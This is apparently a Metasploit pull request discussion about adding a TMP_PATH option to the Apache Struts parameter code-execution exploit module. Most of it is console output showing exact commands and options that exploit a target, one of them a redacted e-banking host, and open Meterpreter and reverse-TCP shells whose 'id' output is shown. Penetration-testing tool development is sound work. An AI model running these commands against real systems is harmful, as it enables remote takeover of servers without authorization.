fix java payload struts module #3347

Merged
merged 1 commit into from May 11, 2014

Conversation

firefart
Contributor

@firefart firefart commented May 9, 2014

This fixes the JAVA payload in the struts_code_exec_parameters exploit as discussed with @jvazquez-r7 in #3343 and on IRC.

This lets the user change the output path of the uploaded binary. In my example the path was not writeable and so the JAVA target did not work correctly.

Output:

$ msfcli exploit/test PARAMETER=username RHOST=ebanking.XXXX RPORT=80 TARGETURI=/login/Login.action TARGET=2 LHOST=10.201.0.70 TMP_PATH=/tmp/ E
[*] Initializing modules...
PARAMETER => username
RHOST => ebanking.XXXX
RPORT => 80
TARGETURI => /login/Login.action
TARGET => 2
LHOST => 10.201.0.70
TMP_PATH => /tmp/
[*] Started reverse handler on 10.201.0.70:4444 
[*] ebanking.XXXX:80 - Uploading exploit to /tmp/uiGUly.jar
[*] ebanking.XXXX:80 - Executing payload
[*] Sending stage (30355 bytes) to 192.168.200.234
[*] Meterpreter session 1 opened (10.201.0.70:4444 -> 192.168.200.234:58517) at 2014-05-09 22:17:18 +0000
[+] Deleted /tmp/uiGUly.jar

meterpreter > 

@jvazquez-r7
Contributor

The patch shouldn't break anything; it just allows the user to provide a location to land the payload:

msf > use exploit/multi/http/struts_code_exec_parameters
msf exploit(struts_code_exec_parameters) > set rhost 172.16.158.152
rhost => 172.16.158.152
msf exploit(struts_code_exec_parameters) > set TARGETURI /login/Login.action
TARGETURI => /login/Login.action
msf exploit(struts_code_exec_parameters) > set PARAMETER username
PARAMETER => username
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.152:8080 - Uploading exploit to xiZaBE.jar
[*] 172.16.158.152:8080 - Executing payload
[*] Sending stage (30355 bytes) to 172.16.158.152
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.152:34945) at 2014-05-11 18:37:18 -0500
[!] This exploit may require manual cleanup of: xiZaBE.jar

meterpreter > getuid
Server username: juan
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 2.6.32-38-generic (i386)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.152 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(struts_code_exec_parameters) > set target 1
target => 1
msf exploit(struts_code_exec_parameters) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.152:8080 - Uploading exploit to /tmp/2Uy3MR
[*] 172.16.158.152:8080 - Executing payload
[*] Sending stage (36 bytes) to 172.16.158.152
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.152:34946) at 2014-05-11 18:37:39 -0500
[+] Deleted /tmp/2Uy3MR

4126701181
CsSPUZTceKAXluDypmOcNxhipsPWBiKP
clMTTtLbwLzIuWfNdRasYlIbuiqtraDf
id
uid=1000(juan) gid=1000(juan) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(juan)
^C
Abort session 2? [y/N]  y

[*] 172.16.158.152 - Command shell session 2 closed.  Reason: User exit

@jvazquez-r7
Contributor

Native payload with TMP_PATH:

msf exploit(struts_code_exec_parameters) > set TMP_PATH /home/juan
TMP_PATH => /home/juan
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[-] Exploit failed [bad-config]: You need to add a trailing slash/backslash to TMP_PATH
msf exploit(struts_code_exec_parameters) > set TMP_PATH /home/juan/
TMP_PATH => /home/juan/
msf exploit(struts_code_exec_parameters) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.152:8080 - Uploading exploit to /home/juan/SxJHz0R
[*] 172.16.158.152:8080 - Executing payload
[*] Sending stage (36 bytes) to 172.16.158.152
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.152:34947) at 2014-05-11 18:38:41 -0500
[+] Deleted /home/juan/SxJHz0R

1229511197
ohnsFQkegXdiASKpIHIkYwUptPYqGoRn
gtGIVzPaGKaLcnsSxIRwuTQIEvypFSjn
id
uid=1000(juan) gid=1000(juan) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(juan)
^C
Abort session 3? [y/N]  ^Y

Background session 3? [y/N]
1229511197
ohnsFQkegXdiASKpIHIkYwUptPYqGoRn
gtGIVzPaGKaLcnsSxIRwuTQIEvypFSjn
uid=1000(juan) gid=1000(juan) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(juan)
^C
Abort session 3? [y/N]  y

[*] 172.16.158.152 - Command shell session 3 closed.  Reason: User exit

@jvazquez-r7 jvazquez-r7 merged commit dee6b53 into rapid7:master May 11, 2014
jvazquez-r7 added a commit that referenced this pull request May 11, 2014
@jvazquez-r7
Contributor

Landed, thanks @firefart for improving this module!

@firefart firefart deleted the struts_tmp branch May 12, 2014 04:39